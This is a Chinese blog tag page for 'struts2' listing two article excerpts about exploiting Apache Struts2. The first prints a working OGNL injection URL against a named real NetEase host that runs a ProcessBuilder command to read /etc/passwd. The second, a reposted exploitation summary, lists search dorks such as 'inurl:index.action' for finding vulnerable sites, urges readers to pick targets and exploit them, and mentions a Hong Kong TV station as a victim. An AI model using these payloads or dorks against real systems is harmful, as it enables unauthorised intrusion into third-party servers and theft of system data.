标签: struts2

2 篇文章

网易某系统命令执行
网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
struts2漏洞利用总结[转]
该漏洞主要组合一些关键字比较重要,没有NB的关键字,只有爱想的脑袋,比如: Inurl:index.action Inurl:商城.achtion (商城比较多) Inurl:index.achtion 标题:apache struts2 Inurl:action?id= 选定目标,开始利用吧 Struts2这个漏洞很多大站都存在,比如这个香港电视台的,不过这个执行命令卡 我就换个搞过的吧,那样方…